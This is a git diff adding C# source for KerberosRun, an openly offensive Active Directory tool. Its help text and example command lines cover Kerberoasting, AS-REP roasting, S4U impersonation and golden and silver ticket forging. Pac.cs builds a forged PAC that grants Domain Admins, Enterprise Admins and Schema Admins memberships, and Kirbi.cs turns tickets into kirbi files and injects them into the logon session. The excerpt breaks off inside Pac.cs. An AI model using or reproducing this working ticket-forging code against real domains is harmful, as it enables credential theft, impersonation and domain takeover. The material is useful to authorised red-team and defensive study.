+</Project>
\ No newline at end of file
diff --git a/KerberosRun/KerberosRun/Kirbi.cs b/KerberosRun/KerberosRun/Kirbi.cs
new file mode 100644
index 0000000..dac4c94
--- /dev/null
+++ b/KerberosRun/KerberosRun/Kirbi.cs
@@ -0,0 +1,407 @@
+using Kerberos.NET.Crypto;
+using Kerberos.NET.Entities;
+using System;
+
+
+namespace KerberosRun
+{
+    class Kirbi
+    {
+        //FROM AS_REP
+        public static byte[] toKirbi(KrbAsRep asRep, KrbEncAsRepPart asDecryptedRepPart, bool ptt = false)
+        {
+
+
+            //https://www.freesoft.org/CIE/RFC/1510/66.htm
+
+            //KrbCredInfo::= SEQUENCE {
+            //                key[0]                 EncryptionKey,
+            //prealm[1]              Realm OPTIONAL,
+            //pname[2]               PrincipalName OPTIONAL,
+            //flags[3]               TicketFlags OPTIONAL,
+            //authtime[4]            KerberosTime OPTIONAL,
+            //starttime[5]           KerberosTime OPTIONAL,
+            //endtime[6]             KerberosTime OPTIONAL
+            //renew - till[7]          KerberosTime OPTIONAL,
+            //srealm[8]              Realm OPTIONAL,
+            //sname[9]               PrincipalName OPTIONAL,
+            //caddr[10]              HostAddresses OPTIONAL
+            //}
+
+            var info = new KrbCredInfo()
+            {
+                Key = asDecryptedRepPart.Key,
+                Realm = asDecryptedRepPart.Realm,
+                PName = asRep.CName,
+                Flags = asDecryptedRepPart.Flags,
+                StartTime = asDecryptedRepPart.StartTime,
+                EndTime = asDecryptedRepPart.EndTime,
+                RenewTill = asDecryptedRepPart.RenewTill,
+                SRealm = asDecryptedRepPart.Realm,
+                SName = asDecryptedRepPart.SName
+            };
+
+
+
+
+            //EncKrbCredPart   ::= [APPLICATION 29]   SEQUENCE {
+            //ticket-info[0]         SEQUENCE OF KrbCredInfo,
+            //nonce[1]               INTEGER OPTIONAL,
+            //timestamp[2]           KerberosTime OPTIONAL,
+            //usec[3]                INTEGER OPTIONAL,
+            //s-address[4]           HostAddress OPTIONAL,
+            //r-address[5]           HostAddress OPTIONAL
+            //}
+
+            KrbCredInfo[] infos = { info };
+
+            var encCredPart = new KrbEncKrbCredPart()
+            {
+                TicketInfo = infos
+
+            };
+
+            //KRB-CRED         ::= [APPLICATION 22]   SEQUENCE {
+            //pvno[0]                INTEGER,
+            //msg - type[1]            INTEGER, --KRB_CRED
+            //tickets[2]             SEQUENCE OF Ticket,
+            //enc - part[3]            EncryptedData
+            //}
+            var myCred = new KrbCred();
+            myCred.ProtocolVersionNumber = 5;
+            myCred.MessageType = MessageType.KRB_CRED;
+            myCred.Tickets = new KrbTicket[] { asRep.Ticket };
+
+
+            //https://github.com/dirkjanm/krbrelayx/blob/master/lib/utils/kerberos.py#L220
+            //No Encryption for KRB-CRED
+            var encryptedData = new KrbEncryptedData()
+            {
+                Cipher = encCredPart.EncodeApplication(),
+            };
+
+            myCred.EncryptedPart = encryptedData;
+
+            byte[] kirbiBytes = myCred.EncodeApplication().ToArray();
+
+
+            string kirbiString = Convert.ToBase64String(kirbiBytes);
+
+            if (ptt) { LSA.ImportTicket(kirbiBytes, new LUID()); }
+            
+
+            return kirbiBytes;
+        }
+
+
+        //FROM TGS_REP
+        public static byte[] toKirbi(KrbTgsRep tgsRep, KrbEncTgsRepPart tgsDecryptedRepPart, bool ptt = false)
+        {
+            //KrbCredInfo::= SEQUENCE {
+            //                key[0]                 EncryptionKey,
+            //prealm[1]              Realm OPTIONAL,
+            //pname[2]               PrincipalName OPTIONAL,
+            //flags[3]               TicketFlags OPTIONAL,
+            //authtime[4]            KerberosTime OPTIONAL,
+            //starttime[5]           KerberosTime OPTIONAL,
+            //endtime[6]             KerberosTime OPTIONAL
+            //renew - till[7]          KerberosTime OPTIONAL,
+            //srealm[8]              Realm OPTIONAL,
+            //sname[9]               PrincipalName OPTIONAL,
+            //caddr[10]              HostAddresses OPTIONAL
+            //}
+
+            var info = new KrbCredInfo()
+            {
+                Key = tgsDecryptedRepPart.Key,
+                Realm = tgsDecryptedRepPart.Realm,
+                PName = tgsRep.CName,
+                Flags = tgsDecryptedRepPart.Flags,
+                StartTime = tgsDecryptedRepPart.StartTime,
+                EndTime = tgsDecryptedRepPart.EndTime,
+                RenewTill = tgsDecryptedRepPart.RenewTill,
+                SRealm = tgsDecryptedRepPart.Realm,
+                SName = tgsDecryptedRepPart.SName
+            };
+
+
+
+
+            //EncKrbCredPart   ::= [APPLICATION 29]   SEQUENCE {
+            //ticket-info[0]         SEQUENCE OF KrbCredInfo,
+            //nonce[1]               INTEGER OPTIONAL,
+            //timestamp[2]           KerberosTime OPTIONAL,
+            //usec[3]                INTEGER OPTIONAL,
+            //s-address[4]           HostAddress OPTIONAL,
+            //r-address[5]           HostAddress OPTIONAL
+            //}
+
+            KrbCredInfo[] infos = { info };
+
+            var encCredPart = new KrbEncKrbCredPart()
+            {
+                TicketInfo = infos
+
+            };
+
+            //KRB-CRED         ::= [APPLICATION 22]   SEQUENCE {
+            //pvno[0]                INTEGER,
+            //msg - type[1]            INTEGER, --KRB_CRED
+            //tickets[2]             SEQUENCE OF Ticket,
+            //enc - part[3]            EncryptedData
+            //}
+            var myCred = new KrbCred();
+            myCred.ProtocolVersionNumber = 5;
+            myCred.MessageType = MessageType.KRB_CRED;
+            KrbTicket[] tickets = { tgsRep.Ticket };
+            myCred.Tickets = tickets;
+
+
+            var encryptedData = new KrbEncryptedData()
+            {
+                Cipher = encCredPart.EncodeApplication(),
+            };
+
+            myCred.EncryptedPart = encryptedData;
+
+            byte[] kirbiBytes = myCred.EncodeApplication().ToArray();
+
+
+            string kirbiString = Convert.ToBase64String(kirbiBytes);
+
+            if (ptt) { LSA.ImportTicket(kirbiBytes, new LUID()); }
+            
+
+            return kirbiBytes;
+        }
+
+
+        //FROM TGT
+        public static byte[] toKirbi(KrbTicket tgt, string hash, EncryptionType etype,  bool ptt = false, bool verbose = false)
+        {
+
+            var kerbCred = new Utils.KerberosHashCreds("krbtgt", hash, etype);
+
+            var ticketDecrypted = tgt.EncryptedPart.Decrypt
+                                (kerbCred.CreateKey(),
+                                KeyUsage.Ticket,
+                                b => KrbEncTicketPart.DecodeApplication(b));
+
+
+            //https://www.freesoft.org/CIE/RFC/1510/66.htm
+
+            //KrbCredInfo::= SEQUENCE {
+            //                key[0]                 EncryptionKey,
+            //prealm[1]              Realm OPTIONAL,
+            //pname[2]               PrincipalName OPTIONAL,
+            //flags[3]               TicketFlags OPTIONAL,
+            //authtime[4]            KerberosTime OPTIONAL,
+            //starttime[5]           KerberosTime OPTIONAL,
+            //endtime[6]             KerberosTime OPTIONAL
+            //renew - till[7]          KerberosTime OPTIONAL,
+            //srealm[8]              Realm OPTIONAL,
+            //sname[9]               PrincipalName OPTIONAL,
+            //caddr[10]              HostAddresses OPTIONAL
+            //}
+
+            var info = new KrbCredInfo()
+            {
+                Key = ticketDecrypted.Key,
+                Realm = ticketDecrypted.CRealm,
+                PName = ticketDecrypted.CName,
+                Flags = ticketDecrypted.Flags,
+                StartTime = ticketDecrypted.StartTime,
+                EndTime = ticketDecrypted.EndTime,
+                RenewTill = ticketDecrypted.RenewTill,
+                SRealm = ticketDecrypted.CRealm,
+                SName = new KrbPrincipalName
+                {
+                    Type = PrincipalNameType.NT_SRV_INST,
+                    Name = new[] { "krbtgt", ticketDecrypted.CRealm }
+                }
+            };
+
+
+
+
+            //EncKrbCredPart   ::= [APPLICATION 29]   SEQUENCE {
+            //ticket-info[0]         SEQUENCE OF KrbCredInfo,
+            //nonce[1]               INTEGER OPTIONAL,
+            //timestamp[2]           KerberosTime OPTIONAL,
+            //usec[3]                INTEGER OPTIONAL,
+            //s-address[4]           HostAddress OPTIONAL,
+            //r-address[5]           HostAddress OPTIONAL
+            //}
+
+            KrbCredInfo[] infos = { info };
+
+            var encCredPart = new KrbEncKrbCredPart()
+            {
+                TicketInfo = infos
+
+            };
+
+            
+            //KRB-CRED         ::= [APPLICATION 22]   SEQUENCE {
+            //pvno[0]                INTEGER,
+            //msg - type[1]            INTEGER, --KRB_CRED
+            //tickets[2]             SEQUENCE OF Ticket,
+            //enc - part[3]            EncryptedData
+            //}
+            var myCred = new KrbCred();
+            myCred.ProtocolVersionNumber = 5;
+            myCred.MessageType = MessageType.KRB_CRED;
+            myCred.Tickets = new KrbTicket[] { tgt };
+
+
+            //https://github.com/dirkjanm/krbrelayx/blob/master/lib/utils/kerberos.py#L220
+            //No Encryption for KRB-CRED
+            var encryptedData = new KrbEncryptedData()
+            {
+                Cipher = encCredPart.EncodeApplication()
+            };
+
+            myCred.EncryptedPart = encryptedData;
+
+            byte[] kirbiBytes = myCred.EncodeApplication().ToArray();
+
+
+            string kirbiString = Convert.ToBase64String(kirbiBytes);
+
+            if (ptt) { LSA.ImportTicket(kirbiBytes, new LUID()); }
+            else
+            {
+                Console.WriteLine("[+] Golden Ticket Kirbi:");
+                Console.WriteLine("    - {0}", kirbiString);
+            }
+            if (verbose)
+            {
+                Console.WriteLine("[*] Ticket Info:");
+                PrintFunc.PrintKirbi(kirbiString);
+            }
+
+
+            return kirbiBytes;
+        }
+
+
+        //FROM TGS
+        public static byte[] toKirbi(KrbTicket tgs, string srvName, string srvHash, EncryptionType etype, string service, bool ptt = false, bool verbose = false)
+        {
+
+            var kerbCred = new Utils.KerberosHashCreds(srvName, srvHash, etype);
+
+            var ticketDecrypted = tgs.EncryptedPart.Decrypt
+                                (kerbCred.CreateKey(),
+                                KeyUsage.Ticket,
+                                b => KrbEncTicketPart.DecodeApplication(b));
+
+
+            //KrbCredInfo::= SEQUENCE {
+            //                key[0]                 EncryptionKey,
+            //prealm[1]              Realm OPTIONAL,
+            //pname[2]               PrincipalName OPTIONAL,
+            //flags[3]               TicketFlags OPTIONAL,
+            //authtime[4]            KerberosTime OPTIONAL,
+            //starttime[5]           KerberosTime OPTIONAL,
+            //endtime[6]             KerberosTime OPTIONAL
+            //renew - till[7]          KerberosTime OPTIONAL,
+            //srealm[8]              Realm OPTIONAL,
+            //sname[9]               PrincipalName OPTIONAL,
+            //caddr[10]              HostAddresses OPTIONAL
+            //}
+
+            string srvHost = null;
+            if (srvName.Contains("$"))
+            {
+                srvHost = srvName.Replace("$", string.Empty) + "." + ticketDecrypted.CRealm;
+            }
+            else
+            {
+                srvHost = srvName;
+            }
+
+            var info = new KrbCredInfo()
+            {
+                Key = ticketDecrypted.Key,
+                Realm = ticketDecrypted.CRealm,
+                PName = ticketDecrypted.CName,
+                Flags = ticketDecrypted.Flags,
+                StartTime = ticketDecrypted.StartTime,
+                EndTime = ticketDecrypted.EndTime,
+                RenewTill = ticketDecrypted.RenewTill,
+                SRealm = ticketDecrypted.CRealm,
+                SName = new KrbPrincipalName()
+                {
+                    Type = PrincipalNameType.NT_SRV_INST,
+                    Name = new[] { service, srvHost }
+                }
+            };
+
+
+
+
+            //EncKrbCredPart   ::= [APPLICATION 29]   SEQUENCE {
+            //ticket-info[0]         SEQUENCE OF KrbCredInfo,
+            //nonce[1]               INTEGER OPTIONAL,
+            //timestamp[2]           KerberosTime OPTIONAL,
+            //usec[3]                INTEGER OPTIONAL,
+            //s-address[4]           HostAddress OPTIONAL,
+            //r-address[5]           HostAddress OPTIONAL
+            //}
+
+            KrbCredInfo[] infos = { info };
+
+            var encCredPart = new KrbEncKrbCredPart()
+            {
+                TicketInfo = infos
+
+            };
+
+            //KRB-CRED         ::= [APPLICATION 22]   SEQUENCE {
+            //pvno[0]                INTEGER,
+            //msg - type[1]            INTEGER, --KRB_CRED
+            //tickets[2]             SEQUENCE OF Ticket,
+            //enc - part[3]            EncryptedData
+            //}
+            var myCred = new KrbCred();
+            myCred.ProtocolVersionNumber = 5;
+            myCred.MessageType = MessageType.KRB_CRED;
+            KrbTicket[] tickets = { tgs };
+            myCred.Tickets = tickets;
+
+
+            //https://github.com/dirkjanm/krbrelayx/blob/master/lib/utils/kerberos.py#L220
+            //No Encryption for KRB-CRED
+            var encryptedData = new KrbEncryptedData()
+            {
+                Cipher = encCredPart.EncodeApplication()
+            };
+
+            myCred.EncryptedPart = encryptedData;
+
+            byte[] kirbiBytes = myCred.EncodeApplication().ToArray();
+
+
+            string kirbiString = Convert.ToBase64String(kirbiBytes);
+
+            if (ptt) { LSA.ImportTicket(kirbiBytes, new LUID());}
+            else
+            {
+                Console.WriteLine("[+] SliverTicket Ticket Kirbi:");
+                Console.WriteLine("    - {0}", kirbiString);
+            }
+            if (verbose) 
+            {
+                Console.WriteLine("[*] Ticket Info:");
+                PrintFunc.PrintKirbi(kirbiString); 
+            }
+
+
+            return kirbiBytes;
+        }
+   
+    
+    
+    }
+}
diff --git a/KerberosRun/KerberosRun/KrbConstants.cs b/KerberosRun/KerberosRun/KrbConstants.cs
new file mode 100644
index 0000000..6795eef
--- /dev/null
+++ b/KerberosRun/KerberosRun/KrbConstants.cs
@@ -0,0 +1,102 @@
+using System;
+using Kerberos.NET.Crypto;
+using System.Threading;
+using System.Collections.Generic;
+using System.Text;
+using System.Runtime.CompilerServices;
+
+namespace KerberosRun
+{
+    class KrbConstants
+    {
+        internal static class KerberosConstants
+        {
+            private static readonly int Pid = System.Diagnostics.Process.GetCurrentProcess().Id;
+
+            private static long RequestCounter = 0;
+
+            private static long NonceCounter = DateTimeOffset.UtcNow.Ticks / 1_000_000_000L;
+
+            public static readonly DateTimeOffset EndOfTime = new DateTimeOffset(642720196850000000, TimeSpan.Zero);
+
+            public static IEnumerable<EncryptionType> ETypes = new[] {
+            EncryptionType.AES256_CTS_HMAC_SHA1_96,
+            EncryptionType.AES128_CTS_HMAC_SHA1_96,
+            EncryptionType.RC4_HMAC_NT,
+            EncryptionType.RC4_HMAC_NT_EXP,
+            EncryptionType.RC4_HMAC_OLD_EXP
+        };
+
+            internal static Guid GetRequestActivityId()
+            {
+                var counter = Interlocked.Increment(ref RequestCounter);
+
+                var b = BitConverter.GetBytes(counter);
+
+                return new Guid(Pid, 0, 0, b[7], b[6], b[5], b[4], b[3], b[2], b[1], b[0]);
+            }
+
+            internal static int GetNonce()
+            {
+                // .NET Runtime guarantees operations on variables up to the natural 
+                // processor pointer size are intrinsically atomic, but there's no
+                // guarantee we'll be running in a 64 bit process on a 64 bit processor
+                // so maybe let's not give the system an opportunity to corrupt this
+
+                var counter = Interlocked.Increment(ref NonceCounter);
+
+                return (int)counter;
+            }
+
+            public static bool WithinSkew(DateTimeOffset now, DateTimeOffset ctime, int usec, TimeSpan skew)
+            {
+                ctime = ctime.AddTicks(usec / 10);
+
+                var skewed = TimeSpan.FromMilliseconds(Math.Abs((now - ctime).TotalMilliseconds));
+
+                return skewed <= skew;
+            }
+
+            private const int TickUSec = 1000000;
+
+            [MethodImpl(MethodImplOptions.AggressiveInlining)]
+            public static bool TimeEquals(DateTimeOffset left, DateTimeOffset right)
+            {
+                var leftUsec = left.Ticks % TickUSec;
+                var rightUsec = right.Ticks % TickUSec;
+
+                return leftUsec == rightUsec;
+            }
+
+            [MethodImpl(MethodImplOptions.AggressiveInlining)]
+            public static void Now(out DateTimeOffset time, out int usec)
+            {
+                var nowTicks = DateTimeOffset.UtcNow.Ticks;
+
+                usec = (int)nowTicks % TickUSec;
+
+                time = new DateTimeOffset(nowTicks - usec, TimeSpan.Zero);
+            }
+
+            [MethodImpl(MethodImplOptions.AggressiveInlining)]
+            public static void Now(out DateTimeOffset time, out int? usec)
+            {
+                Now(out time, out int usecExplicit);
+
+                usec = usecExplicit;
+            }
+
+            [MethodImpl(MethodImplOptions.AggressiveInlining)]
+            public static ReadOnlyMemory<byte> UnicodeBytesToUtf8(byte[] str)
+            {
+                return Encoding.Convert(Encoding.Unicode, Encoding.UTF8, str, 0, str.Length);
+            }
+
+            [MethodImpl(MethodImplOptions.AggressiveInlining)]
+            public static ReadOnlyMemory<byte> UnicodeStringToUtf8(string str)
+            {
+                return UnicodeBytesToUtf8(Encoding.Unicode.GetBytes(str));
+            }
+        }
+    }
+}
diff --git a/KerberosRun/KerberosRun/Options.cs b/KerberosRun/KerberosRun/Options.cs
new file mode 100644
index 0000000..7138031
--- /dev/null
+++ b/KerberosRun/KerberosRun/Options.cs
@@ -0,0 +1,188 @@
+using CommandLine;
+
+namespace KerberosRun
+{
+    public class Options
+    {
+
+        /// <summary>
+        /// Commands
+        /// </summary>
+        [Option("Kerberoast", DefaultValue = false, HelpText = "Perform Kerberoasting...")]
+        public bool Kerberoast { get; set; }
+
+        [Option("Asreproast", DefaultValue = false, HelpText = "Perform Asreproasting...")]
+        public bool Asreproast { get; set; }
+
+        [Option("AskTGT", DefaultValue = false, HelpText = "Ask for a TGT...")]
+        public bool AskTGT { get; set; }
+
+        [Option("AskTGS", DefaultValue = false, HelpText = "Ask for a TGS...")]
+        public bool AskTGS { get; set; }
+
+        [Option("S4U", DefaultValue = false, HelpText = "Perform S4U...")]
+        public bool S4U { get; set; }
+
+        [Option("S4U2Self", DefaultValue = false, HelpText = "Perform S4U2Self...")]
+        public bool S4U2Self { get; set; }
+
+        [Option("Sliver", DefaultValue = false, HelpText = "Build Sliver Ticket...")]
+        public bool Sliver { get; set; }
+
+        [Option("Golden", DefaultValue = false, HelpText = "Build Golden Ticket...")]
+        public bool Golden { get; set; }
+
+        //[Option("S4U2Proxy", DefaultValue = false, HelpText = "Perform S4U2Proxy...")]
+        //public bool S4U2Proxy { get; set; }
+
+        [Option("Ticket", DefaultValue = null, HelpText = "Pass base64 encoded kirbi ticket...")]
+        public string Ticket { get; set; }
+
+
+
+
+
+        /// <summary>
+        /// Parameters
+        /// </summary>
+        [Option("Domain", DefaultValue = null, HelpText = "Domain Name")]
+        public string Domain { get; set; }
+
+        [Option("User", DefaultValue = null, HelpText = "Username")]
+        public string User { get; set; }
+
+        [Option("Impersonateuser", DefaultValue = null, HelpText = "Impersonate Username")]
+        public string Impersonate { get; set; }
+
+        [Option("Pass", DefaultValue = null, HelpText = "Password")]
+        public string Pass { get; set; }
+
+        [Option("Host", DefaultValue = null, HelpText = "Target Server")]
+        public string Host { get; set; }
+
+        [Option("Service", DefaultValue = null, HelpText = "Service for a sliver ticket")]
+        public string Service { get; set; }
+
+        [Option("RC4", DefaultValue = null, HelpText = "RC4 Hash")]
+        public string RC4 { get; set; }
+
+        [Option("AES128", DefaultValue = null, HelpText = "AES128 Hash")]
+        public string AES128 { get; set; }
+
+        [Option("AES256", DefaultValue = null, HelpText = "AES256 Hash")]
+        public string AES256 { get; set; }
+
+        [Option("Spn", DefaultValue = null, HelpText = "SPN")]
+        public string Spn { get; set; }
+
+        [Option("Format", DefaultValue = "hashcat", HelpText = "Hash Format")]
+        public string Format { get; set; }
+
+        //[Option("KrbtgtHash", DefaultValue = null, HelpText = "Krbtgt Account Hash")]
+        //public string KrbtgtHash { get; set; }
+
+        [Option("UserID", DefaultValue = 500, HelpText = "User ID")]
+        public int UserID { get; set; }
+
+        [Option("DomainSID", DefaultValue = null, HelpText = "Domain SID")]
+        public string DomainSID { get; set; }
+
+        [Option("DecryptEtype", DefaultValue = null, HelpText = "Decrypt Encryption Type")]
+        public string DecryptEtype { get; set; }
+
+        [Option("DecryptTGT", DefaultValue = null, HelpText = "Decrypt TGT")]
+        public string DecryptTGT { get; set; }
+
+        [Option("DecryptTGS", DefaultValue = null, HelpText = "Decrypt TGS")]
+        public string DecryptTGS { get; set; }
+
+        [Option("SrvName", DefaultValue = null, HelpText = "Service Account Name for decrypting TGS")]
+        public string SrvName { get; set; }
+
+        [Option("Verbose", DefaultValue = false, HelpText = "Verbose")]
+        public bool Verbose { get; set; }
+
+        [Option("Outfile", DefaultValue = false, HelpText = "Write Kirbi file.")]
+        public bool Outfile { get; set; }
+
+        [Option("PTT", DefaultValue = false, HelpText = "Pass The Ticket into current session")]
+        public bool PTT { get; set; }
+
+
+        [HelpOption]
+        public string GetHelp()
+        {
+            var help = @"
+Usage: KerberosRun.exe -h
+    
+    [--AskTGT]              Ask for a TGT
+        --User*             A valid username
+        --Pass              A valid password
+
+    [--AskTGS]              Ask for a TGS
+        --User*             A valid username
+        --Pass              A valid password   
+        --SPN*              Target SPN for the service request
+
+    [--Kerberoast]          Kerberoasting
+        --User*             A valid username
+        --Pass              A valid password   
+        --SPN*              Target SPN for Kerberoasting
+
+    [--Asreproast]          ASREPRoasting
+        --User*             A valid username that does not require PreAuth
+        --Format            Output Hash format (John/Hashcat, Default: Hashcat)
+
+    [--S4U2Self]            Service for User to Self
+        --User*             A valid username that has SPN set
+        --Pass              A valid password
+        --ImperonsateUser*  A user to impersonate
+
+    [--S4U]                 S4U2Self and S4U2Proxy
+        --User*             A valid username that has SPN set
+        --Pass              A valid password
+        --Imperonsate*      A user to impersonate
+        --SPN*              Target SPN for impersonate user
+
+    [--Golden]              Build a Golden Ticket
+        --RC4/AES128/AES256 krbtgt account hash
+        --DomainSid*        Domain SIDs
+        --UserID            User ID (default: 500)
+        --User*             User name for the golden ticket
+
+    [--Sliver]              Make a Sliver Ticket
+        --RC4/AES128/AES256 Service account hash
+        --DomainSid*        Domain SID
+        --Service*          Service name (HTTP/CIFS/HOST...)
+        --Host*             Target Servers
+        --User*             User name for the sliver ticket
+
+    [--Ticket]              Pass base64 encoded kirbi ticket into current session
+
+     --Domain            A valid domain name (default: current domain)
+     --RC4/AES128/AES256 A valid hash (alternative way for authentication) 
+     --Verbose           Verbose mode
+     --Outfile           Write the ticket to a kirbi file under the current directory
+     --PTT               Pass the ticket into current session
+     --DecryptTGT        Supply the krbtgt hash and decrypt the TGT ticket
+     --DecryptTGS        Supply the service account hash and decrypt the TGS ticket
+     --DecryptEtype   The encryption type of the hash for decrypting tickets (rc4/aes128/aes256) 
+     --SrvName           The service account name for decrypting TGS
+
+
+Example:  
+        .\KerberosRun.exe --Asktgt --user username --pass password --verbose --outfile --decrypttgt [krbtgtHash] --decryptetype aes256
+        .\KerberosRun.exe --Asktgs --user username --pass password --spn service/srv.domain.com --verbose --outfile
+        .\KerberosRun.exe --Asreproast --user username --verbose
+        .\KerberosRun.exe --Kerberoast --user username --rc4 [RC4Hash] --spn service/srv.domain.com
+        .\KerberosRun.exe --S4U2Self --user username --aes128 [AES128Hash] --impersonateuser administrator --verbose
+        .\KerberosRun.exe --S4U --user username --aes256 [AES256Hash] --impersonateuser administrator --spn ldap/dc1.domain.com --ptt
+        .\KerberosRun.exe --Golden --user administrator --domain domain.com --userid 500 --domainsid  [DomainSID] --RC4 [krbtgtHash] --ptt
+        .\KerberosRun.exe --Sliver --user administrator --domain domain.com --domainsid  [DomainSID] --RC4 [srvHash] --Service HTTP --HOST DC01$ -ptt
+        .\KerberosRun.exe --Ticket Base64EncodedKirbiString/KirbiTicketFiles
+                ";
+            return help;
+        }
+
+    }
+}
diff --git a/KerberosRun/KerberosRun/Pac.cs b/KerberosRun/KerberosRun/Pac.cs
new file mode 100644
index 0000000..aefb81a
--- /dev/null
+++ b/KerberosRun/KerberosRun/Pac.cs
@@ -0,0 +1,235 @@
+using Kerberos.NET;
+using Kerberos.NET.Credentials;
+using Kerberos.NET.Crypto;
+using Kerberos.NET.Entities;
+using Kerberos.NET.Entities.Pac;
+using Kerberos.NET.Ndr;
+using System;
+using System.Collections.Generic;
+using System.IO;
+using System.Linq;
+using System.Runtime.InteropServices;
+
+namespace KerberosRun
+{
+    class Pac
+    {
+        //KDC KRB_AP_ERR_MODIFIED: Message stream modified
+        //During TGS processing, the KDC was unable to verify the signature on the PAC from krbtgt. This indicates the PAC was modified.
+
+        //Kerberos PAC Validation
+        //https://docs.microsoft.com/en-us/archive/blogs/openspecification/understanding-microsoft-kerberos-pac-validation
+        public static KrbAuthorizationData[] generatePac(string username, string domainsid, string domainname, KerberosKey key, DateTime now,
+            int userid = 500)
+        {
+
+            Console.WriteLine("[*] Building PAC ...");
+
+            //////////////Build PAC
+
+            var forgedPac = new PrivilegedAttributeCertificate();
+
+            ////////////////
+            //https://github.com/SecWiki/windows-kernel-exploits/blob/5593d65dcb94696242687904b55f4e27ce33f235/MS14-068/pykek/kek/pac.py#L56
+            //PAC_LOGON_INFO
+            var logonInfo = new PacLogonInfo();
+            // LogonTime
+            logonInfo.LogonTime = RpcFileTime.Convert(now);
+            // LogoffTime
+            ///logonInfo.LogoffTime = RpcFileTime.Convert(DateTime.MinValue);
+            // KickOffTime
+            //logonInfo.KickOffTime = RpcFileTime.Convert(DateTime.MinValue);
+            // PasswordLastSet
+            //logonInfo.PwdLastChangeTime = RpcFileTime.Convert(DateTime.Now.AddDays(-22));
+            // PasswordCanChange
+            //logonInfo.PwdCanChangeTime = RpcFileTime.Convert(DateTime.Now.AddDays(-21));
+            // PasswordMustChange
+            //logonInfo.PwdMustChangeTime = RpcFileTime.Convert(DateTime.MinValue);
+            // EffectiveName
+            logonInfo.UserName = username;
+            // FullName
+            //logonInfo.UserDisplayName = null;
+            // LogonScript
+            //logonInfo.LogonScript = "";
+            // ProfilePath
+            //logonInfo.ProfilePath = "";
+            // HomeDirectory
+            //logonInfo.HomeDirectory = "";
+            // HomeDirectoryDrive
+            //logonInfo.HomeDrive = "";
+            // LogonCount
+            //logonInfo.LogonCount = 0;
+            // BadPasswordCount
+            //logonInfo.BadPasswordCount = 0;
+            // UserId
+            logonInfo.UserId = (uint)userid;
+            // PrimaryGroupId
+            logonInfo.GroupId = 513;
+            // GroupCount
+            // GroupIds[0]
+            var se_group_all = SidAttributes.SE_GROUP_ENABLED |
+                    SidAttributes.SE_GROUP_ENABLED_BY_DEFAULT |
+                    SidAttributes.SE_GROUP_INTEGRITY |
+                    SidAttributes.SE_GROUP_INTEGRITY_ENABLED |
+                    SidAttributes.SE_GROUP_LOGON_ID |
+                    SidAttributes.SE_GROUP_MANDATORY |
+                    SidAttributes.SE_GROUP_OWNER |
+                    SidAttributes.SE_GROUP_RESOURCE ;
+                    //SidAttributes.SE_GROUP_USE_FOR_DENY_ONLY;
+            IEnumerable<GroupMembership> groupIds = new GroupMembership[]
+            {
+                new GroupMembership()
+                {
+                    Attributes = se_group_all,
+                    RelativeId = 513
+                },
+                new GroupMembership()
+                {
+                    Attributes = se_group_all,
+                    RelativeId = 512
+                },
+                new GroupMembership()
+                {
+                    Attributes = se_group_all,
+                    RelativeId = 520
+                },
+                new GroupMembership()
+                {
+                    Attributes = se_group_all,
+                    RelativeId = 518
+                },
+                new GroupMembership()
+                {
+                    Attributes = se_group_all,
+                    RelativeId = 519
+                },
+            };
+            logonInfo.GroupIds = groupIds;
+            // UserFlags
+            logonInfo.UserFlags = UserFlags.LOGON_EXTRA_SIDS;
+            // UserSessionKey
+            string userSessKeyStr = "00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00";
+            byte[] keyByte = Array.ConvertAll<string, byte>(userSessKeyStr.Split('-'), s => Convert.ToByte(s, 16));
+            logonInfo.UserSessionKey = keyByte.ToArray().AsMemory();
+            // LogonServer
+            //logonInfo.ServerName = "";
+            // LogonDomainName
+            logonInfo.DomainName = domainname.ToUpper();//domainname.Split('.')[0].ToUpper();
+
+
+            // LogonDomainId
+            domainsid = domainsid.Replace("S-1-5-", string.Empty);
+            var subCount = domainsid.Split('-').Length;
+
+            uint[] subAuth = new uint[subCount];
+            for (int i=0; i < subCount; i++ )
+            {
+                subAuth[i] = uint.Parse(domainsid.Split('-')[i]);
+            }
+
+            var identAuth = new byte[6];
+            identAuth[5] = (int)IdentifierAuthority.NTAuthority;
+
+            logonInfo.DomainId = new RpcSid()
+            {
+                IdentifierAuthority = new RpcSidIdentifierAuthority()
+                {
+                    IdentifierAuthority = identAuth
+                },
+                SubAuthority = subAuth.AsMemory(),
+                SubAuthorityCount = (byte)subCount,
+                Revision = 1
+            };
+
+
+
+            // Reserved1
+            int[] reserved1 = { 0, 0 };
+            logonInfo.Reserved1 = reserved1.ToArray().AsMemory();
+            // UserAccountControl
+            logonInfo.UserAccountControl = UserAccountControlFlags.ADS_UF_NORMAL_ACCOUNT |
+                UserAccountControlFlags.ADS_UF_LOCKOUT;
+            // SubAuthStatus
+            logonInfo.SubAuthStatus = 0;
+            // LastSuccessFulILogon
+            logonInfo.LastSuccessfulILogon = RpcFileTime.Convert(new DateTime(1601, 1, 1, 12, 00, 00));
+            // LastFailedILogon
+            logonInfo.LastFailedILogon = RpcFileTime.Convert(new DateTime(1601, 1, 1, 12, 00, 00));
+            // FailedILogonCount
+            logonInfo.FailedILogonCount = 0;
+            // Reserved3
+            logonInfo.Reserved3 = 0;
+            // SidCount
+            // ExtraSids
+            // ResourceGroupDomainSid
+            // ResourceGroupCount
+            // ResourceGroupIdss
+            //logonInfo.ResourceGroupIds = null;// new GroupMembership[] { };
+            // ExtraIds
+            //RpcSidAttributes[] extraIds =
+            //{
+            //    new RpcSidAttributes()
+            //    {
+            //        Sid = new RpcSid()
+            //        {
+            //            IdentifierAuthority = new RpcSidIdentifierAuthority(){},
+            //            Revision = 1,
+            //            //SubAuthority = a.ToArray().AsMemory()
+            //        },
+            //        Attributes = se_group_all
+            //    } 
+            //};
+            //logonInfo.ExtraIds = extraIds;
+            //logonInfo.ResourceGroupIds = new GroupMembership[] { };
+
+            forgedPac.LogonInfo = logonInfo;
+
+
+
+            ////////////////
+            //PAC_CLIENT_INFO
+            var clientInformation = new PacClientInfo()
+            {
+                Name = username,
+                ClientId = RpcFileTime.Convert(now),
+            };
+
+
+            forgedPac.ClientInformation = clientInformation;
+
+             //From Book: Network Security Assessment Table 7-26
+             //TGT: PAC (KDC)    -> krbtgt
+             //     PAC (Server) -> krbtgt
+            var authz = new List<KrbAuthorizationData>();
+
+
+            var sequence = new KrbAuthorizationDataSequence
+            {
+                AuthorizationData = new[]
+                {
+                    new KrbAuthorizationData
+                    {
+                        Type = AuthorizationDataType.AdWin2kPac,
+                        Data =  forgedPac.Encode(key, key)
+                    }
+                }
+            };
+
+            authz.Add(
